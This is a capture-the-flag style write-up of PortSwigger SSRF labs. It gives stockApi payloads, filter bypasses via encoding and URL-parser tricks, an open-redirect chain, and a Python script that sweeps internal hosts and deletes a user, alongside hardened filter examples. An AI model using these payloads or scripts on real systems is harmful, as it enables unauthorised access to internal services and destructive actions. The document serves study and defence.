
SSRF Labs Overview

Tools Used

  1. Burp Suite: Proxy (intercept), Repeater and Intruder

1. Basic SSRF against the local server

The solution is straightforward.

The stock checker sends the URL it should fetch in the stockApi parameter of the POST /product/stock request. Because the server makes that request itself, pointing the parameter at the admin interface on the local server is enough to delete the user:

stockApi=http://localhost/admin/delete?username=carlos

2. Basic SSRF against another back-end system

In this lab the admin interface is on a different back-end host, 192.168.0.X on port 8080 (the port comes from the lab description). Send the stock request to Burp Intruder with the last octet "X" as the payload position (1 to 255) and stockApi set to http://192.168.0.X:8080/admin; the one host that answers 200 is the admin interface. Everything else is the same as above: repeat the request with that octet and the delete path.

stockApi=http://192.168.0.X:8080/admin/delete?username=carlos
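A scripted version of the Intruder sweep, as an added example for this write-up (it is not PortSwigger's code and not from the original post). It serves labs 1 and 2: the same POST to /product/stock carries any stockApi URL, here iterated over the last octet. LAB_HOST and SESSION are placeholders to fill in, the 8080 admin port comes from the lab description, and the "status 200 with admin in the body" heuristic for spotting the right host is an assumption to check against the real responses.

```python
import urllib.error
import urllib.request
from urllib.parse import quote

# Placeholders (assumptions): substitute the lab's hostname and your session cookie.
LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"
SESSION = "YOUR-SESSION-COOKIE"
ADMIN_PORT = 8080  # port of the back-end admin interface given in the lab text


def stock_api_payload(octet, port=ADMIN_PORT, path="/admin"):
    """Candidate back-end URL for one value of the last octet of 192.168.0.X."""
    return f"http://192.168.0.{octet}:{port}{path}"


def build_body(target_url):
    """Form-encode the stockApi value. '&' must become %26 so the target's own
    query string is not split by the outer form parser; '/', ':', '?', '='
    are left readable, as in the Repeater payloads above."""
    return "stockApi=" + quote(target_url, safe="/:?=")


def make_http_sender(lab_host=LAB_HOST, session=SESSION, timeout=10):
    """Return send(target_url) -> (status, body) that posts to the real stock
    checker. Kept separate so the sweep logic can be exercised offline."""
    def send(target_url):
        req = urllib.request.Request(
            f"https://{lab_host}/product/stock",
            data=build_body(target_url).encode(),
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "Cookie": f"session={session}",
            },
            method="POST",
        )
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body
            return err.code, err.read().decode(errors="replace")
        except OSError as err:  # connection failure or timeout
            return None, str(err)
    return send


def find_admin_host(send, octets=range(1, 256), port=ADMIN_PORT):
    """Equivalent of the Intruder sweep: probe /admin on every candidate and
    return the first octet whose response looks like the admin page. The
    200-plus-'admin' heuristic is an assumption; inspect the real responses."""
    for octet in octets:
        status, body = send(stock_api_payload(octet, port))
        if status == 200 and "admin" in body.lower():
            return octet
    return None


def delete_user(send, octet, username="carlos", port=ADMIN_PORT):
    """Second request through the SSRF once the host is known."""
    status, _ = send(stock_api_payload(octet, port, f"/admin/delete?username={username}"))
    return status


if __name__ == "__main__":
    http = make_http_sender()
    found = find_admin_host(http)
    print("admin host octet:", found)
    if found is not None:
        print("delete status:", delete_user(http, found))
```

The sender is injected so the sweep can be driven by a fake during testing; against the live lab each dead host costs a full timeout, which is why Intruder (or a thread pool around `send`) is the practical choice for the full /24.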

3. SSRF with blacklist-based input filter

https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter

  1. Go to a product details page
  2. Intercept the request that fetches stock for the product
  3. Change the URL in the stockApi parameter to http://127.1/ADMIN to reach the admin interface (127.1 is an alternative spelling of the loopback address that the literal 127.0.0.1 check does not match), then send the delete request for carlos through the same bypass

PORTSWIGGER SOLUTION

Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.

Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.

Bypass the block by changing the URL to: http://127.1/

Change the URL to http://127.1/admin and observe that the URL is blocked again.

Obfuscate the "a" by double-URL encoding it to %2561 to access the admin interface and delete the target user.
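To make the two bypasses concrete, here is an added example (my reconstruction for this write-up, not the lab's filter code) that models the blacklist as a one-decode substring check, shows what the fetcher actually sees for the 127.1 and %2561 payloads, and contrasts a check that canonicalises before deciding. The BLOCKED terms are assumed from the lab's behaviour.

```python
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

# Assumed blacklist terms, modelled on the lab's behaviour (not its source).
BLOCKED = ("127.0.0.1", "localhost", "admin")


def naive_filter(stock_api_value):
    """Models the lab's check: the form layer decodes the parameter once,
    then the filter does a literal substring match on the result. A single
    encoding (%61) is undone by that first decode and still gets caught;
    a double encoding (%2561) survives it as %61."""
    decoded = unquote(stock_api_value)
    return not any(term in decoded for term in BLOCKED)


def backend_view(stock_api_value):
    """What the fetcher actually connects to. The socket layer canonicalises
    shorthand IPv4 (127.1 -> 127.0.0.1) and the HTTP path is decoded again
    on the way to the back end, so %2561 -> %61 -> a."""
    parts = urlsplit(unquote(stock_api_value))
    host = socket.inet_ntoa(socket.inet_aton(parts.hostname))
    return host, unquote(parts.path)


def _fully_decoded(value, limit=5):
    """Decode until stable so nested encodings cannot hide anything."""
    for _ in range(limit):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def _resolve(hostname):
    """Canonical IP for the host the fetcher would reach: standard literals
    first, then shorthand/decimal IPv4 via inet_aton, otherwise DNS."""
    try:
        return ipaddress.ip_address(hostname)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(hostname)))
    except OSError:
        return ipaddress.ip_address(socket.gethostbyname(hostname))


def hardened_filter(stock_api_value):
    """Decode fully, parse, resolve, and decide on the canonical form.
    Denying non-global addresses closes the whole 127.1 / 2130706433 family;
    an allowlist of permitted destinations is stronger still. DNS rebinding
    means the resolved address must also be pinned at connect time."""
    parts = urlsplit(_fully_decoded(stock_api_value))
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        ip = _resolve(parts.hostname)
    except OSError:
        return False
    if not ip.is_global:
        return False
    return not parts.path.lower().startswith("/admin")
```

The point of `backend_view` is that the filter and the fetcher never look at the same string: one sees `127.1/%61dmin`, the other connects to `127.0.0.1` and requests `/admin`. Any check that runs before canonicalisation is arguing about a different URL than the one that gets fetched.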

4. SSRF with whitelist-based input filter ( Stuck !!!! )

Stuck in this lab

The whitelist filter is adamant that the host be stock.weliketoshop.net

  1. Tried using a URL fragment, i.e. "#", to separate the URL
  2. Tried using HTTP request smuggling; not extensively, but tried

WHAT TO DO ??
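The fragment idea is the one PortSwigger's published solution for this lab uses, but the '#' has to be double-encoded (%2523) so that the filter, which decodes once, never sees it, while the back end, which decodes again, does. The following added example (my reconstruction for this write-up, not the lab's code) models both tiers with Python's urlsplit: the filter parses the once-decoded URL and sees localhost:80%23 as userinfo in front of the allowed host, while the back end parses the twice-decoded URL, where the '#' ends the authority at localhost:80. The hostname disagreement is reproduced; the exact path the lab's back end then requests is not, because urlsplit drops everything after '#' into the fragment.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOST = "stock.weliketoshop.net"


def whitelist_filter(stock_api_value):
    """Assumed filter: the form layer decodes once (%2523 -> %23), then the
    hostname that the URL parser extracts is checked. With %23 still encoded
    the '@' makes 'localhost:80%23' look like userinfo, so the parsed host
    is the allowed one."""
    host = urlsplit(unquote(stock_api_value)).hostname or ""
    return host == ALLOWED_HOST or host.endswith("." + ALLOWED_HOST)


def backend_parse(stock_api_value):
    """Assumed back end: decodes again before fetching (%23 -> '#'). The '#'
    terminates the authority, so the connection goes to localhost:80 and the
    '@stock.weliketoshop.net...' tail is treated as a fragment."""
    parts = urlsplit(unquote(unquote(stock_api_value)))
    return parts.hostname, parts.port


def craft(target_host, target_port):
    """Shape of PortSwigger's published payload for this lab."""
    return f"http://{target_host}:{target_port}%2523@{ALLOWED_HOST}/admin/delete?username=carlos"


def safer_filter(stock_api_value):
    """Decode fully, parse once with the same parser the fetcher uses, and
    refuse any userinfo or stray '@' in the authority before checking the host."""
    value = stock_api_value
    for _ in range(5):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    parts = urlsplit(value)
    if parts.username is not None or "@" in parts.netloc:
        return False
    host = parts.hostname or ""
    return host == ALLOWED_HOST or host.endswith("." + ALLOWED_HOST)
```

The same lesson as the blacklist lab from the other side: an allowlist on the hostname is only as good as the agreement between the parser that enforces it and the parser that fetches, and between the number of decoding passes each of them performs.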

5. SSRF with filter bypass via open redirection vulnerability

  1. On the product details page ( https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3 ) there is a "next product" button (screenshot omitted)
  2. Clicking this button sends the following request, which we intercept:
GET /product/nextProduct?currentProductId=2&path=/product?productId=4 HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=2
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy
Upgrade-Insecure-Requests: 1

This returns a 302 redirect that sends us to the productId=4 page.

  3. We can try changing the path parameter to reach the admin page, but the admin interface given in the lab instructions is on an internal host, not a path on this site, so sending our own browser through the redirect just keeps spinning and never returns a response.

  4. The stock checker API takes a path on the same site in its stockApi parameter:

POST /product/stock HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Origin: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net
Content-Length: 83
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy

stockApi=/product/stock/check?productId=3%26storeId=2

Setting stockApi=http://host:port/admin directly does not work: the stock checker only accepts a relative path and rejects an absolute URL with an invalid url error.

  5. But the site's own /product/nextProduct endpoint is an open redirect: it sends a 302 to whatever is in path without checking it. Pass that redirect path as the stockApi value, with the internal admin URL as its path parameter, and the stock checker, which fetches relative paths from the server side and follows redirects, ends up requesting the admin interface on the internal host. The & between currentProductId and path must be encoded as %26; left bare, the outer form parser would treat path as a separate parameter of /product/stock instead of part of the stockApi value. Burp Repeater updates Content-Length for the longer body automatically; if you replay the request by hand, recompute it.
POST /product/stock HTTP/1.1
Host: acf81faf1e85136180ef3844007100b4.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net/product?productId=3
Content-Type: application/x-www-form-urlencoded
Origin: https://acf81faf1e85136180ef3844007100b4.web-security-academy.net
Content-Length: 83
Connection: close
Cookie: session=ShyBxGx8FgJi4QyE5kq0ROFWPk80ehxy

stockApi=/product/nextProduct?currentProductId=2%26path=http://192.168.0.12:8080/admin/delete?username=carlos
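The chain above, as an added offline model for this write-up (my reconstruction, not the lab's server code): the stock checker refuses absolute URLs but follows redirects, the nextProduct endpoint redirects wherever path points, and the &-to-%26 encoding keeps the inner query intact through the outer form parser. The shop host and admin host are taken from the captured requests; the handler logic, the hardened variant of the redirect endpoint and the return strings are assumptions for illustration.

```python
from urllib.parse import parse_qs, quote, urljoin, urlsplit

# Taken from the captured requests above.
SHOP_HOST = "acf81faf1e85136180ef3844007100b4.web-security-academy.net"


def build_stock_api_param(target_url, current_product_id=2):
    """Wrap an absolute target in the open redirect so it satisfies the stock
    checker's 'relative path only' rule. Only '&' is encoded (-> %26): left
    bare it would end the stockApi value at the form-parsing layer and 'path'
    would become a separate, ignored parameter of /product/stock."""
    inner = f"/product/nextProduct?currentProductId={current_product_id}&path={target_url}"
    return quote(inner, safe="/:?=")


# Simplified reconstruction of the server-side pieces (assumption, not lab source).

def next_product_handler(path_and_query):
    """The open redirect: 'path' goes straight into Location, unchecked."""
    query = parse_qs(urlsplit(path_and_query).query)
    return 302, {"Location": query["path"][0]}


def hardened_next_product_handler(path_and_query):
    """Same endpoint, fixed: only a same-site relative path may be redirected to."""
    query = parse_qs(urlsplit(path_and_query).query)
    target = query["path"][0]
    parts = urlsplit(target)
    if parts.scheme or parts.netloc or not target.startswith("/"):
        return 400, {}
    return 302, {"Location": target}


def stock_checker(form_body, redirect_handler, max_redirects=3):
    """Models the stock API client: absolute URLs are rejected with the
    'invalid url' error seen above, but redirects are followed blindly and
    from the server's own network position."""
    stock_api = parse_qs(form_body)["stockApi"][0]
    parts = urlsplit(stock_api)
    if parts.scheme or parts.netloc:
        return "invalid url"
    url = f"http://{SHOP_HOST}{stock_api}"
    for _ in range(max_redirects):
        parts = urlsplit(url)
        if parts.netloc != SHOP_HOST:
            # A redirect has taken the fetcher off-site: this is the SSRF reaching the back end.
            return f"fetched {parts.netloc}{parts.path}?{parts.query}"
        if parts.path == "/product/nextProduct":
            status, headers = redirect_handler(f"{parts.path}?{parts.query}")
            if status != 302:
                return f"blocked with {status}"
            url = urljoin(url, headers["Location"])  # relative Location stays on-site
            continue
        return f"fetched {parts.netloc}{parts.path}"
    return "too many redirects"


if __name__ == "__main__":
    body = "stockApi=" + build_stock_api_param("http://192.168.0.12:8080/admin/delete?username=carlos")
    print(body)
    print("open redirect :", stock_checker(body, next_product_handler))
    print("hardened      :", stock_checker(body, hardened_next_product_handler))
```

The fix belongs in the redirect endpoint, not only in the stock checker: a fetcher that follows redirects inherits every open redirect on the site as an SSRF sink, so either the redirect target is constrained to a same-site path, or the fetcher re-applies its destination check to every hop it follows.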